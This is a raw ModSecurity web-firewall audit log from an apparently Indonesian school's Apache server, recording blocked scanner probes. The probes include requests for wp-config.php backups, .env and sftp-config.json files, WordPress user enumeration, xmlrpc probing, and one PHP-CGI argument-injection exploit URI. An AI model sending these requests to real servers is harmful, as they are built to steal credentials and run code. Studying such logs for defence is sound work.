User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--622b243d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--622b243d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721773373809 711 (- - -)
Stopwatch2: 1745721773373809 711; combined=299, p1=251, p2=0, p3=0, p4=0, p5=48, sr=90, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--622b243d-Z--
--6a3b0f04-A--
[27/Apr/2025:09:42:53 +0700] aA2Zrf7FMV4FIoAOnu7e6AAAAAQ 103.236.140.4 45422 103.236.140.4 8181
--6a3b0f04-B--
GET /wp-config.php12 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--6a3b0f04-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6a3b0f04-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721773929180 667 (- - -)
Stopwatch2: 1745721773929180 667; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6a3b0f04-Z--
--c6236461-A--
[27/Apr/2025:14:30:09 +0700] aA3dAcO7TUCRYJ_xfldCUAAAANE 103.236.140.4 59612 103.236.140.4 8181
--c6236461-B--
GET /wp-config.php.save HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 89.46.105.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 89.46.105.196
X-Forwarded-Proto: http
Connection: close
Accept: */*
--c6236461-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c6236461-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745739009122593 721 (- - -)
Stopwatch2: 1745739009122593 721; combined=278, p1=236, p2=0, p3=0, p4=0, p5=41, sr=64, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c6236461-Z--
--bc565342-A--
[27/Apr/2025:14:30:20 +0700] aA3dDP7FMV4FIoAOnu7-MQAAAAc 103.236.140.4 59654 103.236.140.4 8181
--bc565342-B--
GET /wp-config.php.orig HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 162.241.225.150
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 162.241.225.150
X-Forwarded-Proto: http
Connection: close
Accept: */*
--bc565342-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bc565342-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745739020215316 879 (- - -)
Stopwatch2: 1745739020215316 879; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bc565342-Z--
--a07edb30-A--
[27/Apr/2025:16:33:30 +0700] aA356v7FMV4FIoAOnu4J5AAAABg 103.236.140.4 35610 103.236.140.4 8181
--a07edb30-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 198.211.110.161
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 198.211.110.161
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--a07edb30-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a07edb30-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745746410652504 790 (- - -)
Stopwatch2: 1745746410652504 790; combined=363, p1=328, p2=0, p3=0, p4=0, p5=35, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a07edb30-Z--
--6fea567f-A--
[27/Apr/2025:17:57:40 +0700] aA4NpCKLpK55oNIcEw1WXQAAAFQ 103.236.140.4 55062 103.236.140.4 8181
--6fea567f-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--6fea567f-C--
--6fea567f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6fea567f-E--
--6fea567f-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745751460504787 4018 (- - -)
Stopwatch2: 1745751460504787 4018; combined=2935, p1=504, p2=2398, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6fea567f-Z--
--c535496f-A--
[27/Apr/2025:18:39:31 +0700] aA4Xc8O7TUCRYJ_xfldPpAAAAM0 103.236.140.4 36516 103.236.140.4 8181
--c535496f-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 167.172.75.203
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: */*
Cookie:
X-Forwarded-For: 167.172.75.203
Accept-Encoding: gzip
X-Varnish: 138742264
--c535496f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--c535496f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745753971453044 761 (- - -)
Stopwatch2: 1745753971453044 761; combined=334, p1=301, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c535496f-Z--
--a29d9a39-A--
[27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-62wAAAJQ 103.236.140.4 47310 103.236.140.4 8181
--a29d9a39-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 165.22.245.12
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 165.22.245.12
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--a29d9a39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a29d9a39-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745756747607473 667 (- - -)
Stopwatch2: 1745756747607473 667; combined=270, p1=242, p2=0, p3=0, p4=0, p5=28, sr=83, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a29d9a39-Z--
--634d5f11-A--
[27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-63AAAAJg 103.236.140.4 47314 103.236.140.4 8181
--634d5f11-B--
GET /sendgrid/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 165.22.245.12
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 165.22.245.12
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--634d5f11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--634d5f11-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745756747712444 689 (- - -)
Stopwatch2: 1745756747712444 689; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--634d5f11-Z--
--141bce34-A--
[27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-63QAAAIo 103.236.140.4 47318 103.236.140.4 8181
--141bce34-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 165.22.245.12
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 165.22.245.12
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--141bce34-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--141bce34-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745756747985739 685 (- - -)
Stopwatch2: 1745756747985739 685; combined=259, p1=227, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--141bce34-Z--
--68a31770-A--
[27/Apr/2025:22:16:18 +0700] aA5KQiKLpK55oNIcEw1sPgAAAEM 103.236.140.4 47068 103.236.140.4 8181
--68a31770-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.34
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.34
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--68a31770-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--68a31770-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745766978621318 715 (- - -)
Stopwatch2: 1745766978621318 715; combined=295, p1=258, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--68a31770-Z--
--5f491c15-A--
[27/Apr/2025:22:32:24 +0700] aA5OCBkilNlaTSHUe0_M_gAAAI0 103.236.140.4 50604 103.236.140.4 8181
--5f491c15-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.74.185
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.74.185
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--5f491c15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5f491c15-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745767944436824 3101 (- - -)
Stopwatch2: 1745767944436824 3101; combined=1346, p1=443, p2=873, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5f491c15-Z--
--875c2926-A--
[27/Apr/2025:22:32:26 +0700] aA5OCv7FMV4FIoAOnu4y_wAAABA 103.236.140.4 50616 103.236.140.4 8181
--875c2926-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.74.185
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.74.185
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--875c2926-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--875c2926-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745767946786084 2574 (- - -)
Stopwatch2: 1745767946786084 2574; combined=1388, p1=425, p2=928, p3=0, p4=0, p5=34, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--875c2926-Z--
--695db701-A--
[27/Apr/2025:22:32:29 +0700] aA5ODSKLpK55oNIcEw1tlAAAAEc 103.236.140.4 50628 103.236.140.4 8181
--695db701-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.74.185
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.74.185
X-Forwarded-Proto: http
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--695db701-C--
demo.sayHello
--695db701-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--695db701-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745767949125718 6182 (- - -)
Stopwatch2: 1745767949125718 6182; combined=4584, p1=634, p2=3698, p3=31, p4=38, p5=106, sr=139, sw=77, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--695db701-Z--
--c7b5c77c-A--
[27/Apr/2025:22:32:45 +0700] aA5OHf7FMV4FIoAOnu4zBwAAAA4 103.236.140.4 50696 103.236.140.4 8181
--c7b5c77c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.74.185
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.74.185
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--c7b5c77c-C--
demo.sayHello
--c7b5c77c-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c7b5c77c-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745767965882704 6474 (- - -)
Stopwatch2: 1745767965882704 6474; combined=4843, p1=671, p2=3890, p3=37, p4=40, p5=118, sr=117, sw=87, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c7b5c77c-Z--
--9d7a3374-A--
[27/Apr/2025:22:48:26 +0700] aA5RyiKLpK55oNIcEw1xjAAAAFg 103.236.140.4 38142 103.236.140.4 8181
--9d7a3374-B--
GET /sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 13.38.23.15
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 13.38.23.15
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
--9d7a3374-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9d7a3374-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745768906691250 1016 (- - -)
Stopwatch2: 1745768906691250 1016; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9d7a3374-Z--
--4af9665d-A--
[27/Apr/2025:23:47:22 +0700] aA5fmv7FMV4FIoAOnu49VgAAAAo 103.236.140.4 56690 103.236.140.4 8181
--4af9665d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 198.211.110.161
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 198.211.110.161
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--4af9665d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4af9665d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745772442938515 714 (- - -)
Stopwatch2: 1745772442938515 714; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4af9665d-Z--
--717ff17c-A--
[28/Apr/2025:02:11:48 +0700] aA6BdCKLpK55oNIcEw1-UgAAAEo 103.236.140.4 38858 103.236.140.4 8181
--717ff17c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Accept-Charset: utf-8
--717ff17c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--717ff17c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745781108132392 926 (- - -)
Stopwatch2: 1745781108132392 926; combined=370, p1=316, p2=0, p3=0, p4=0, p5=54, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--717ff17c-Z--
--ce28326a-A--
[28/Apr/2025:03:56:22 +0700] aA6Z9mj1i6BJZll4jGOnewAAAIc 103.236.140.4 40514 103.236.140.4 8181
--ce28326a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 138.197.196.84
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 138.197.196.84
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--ce28326a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ce28326a-H--
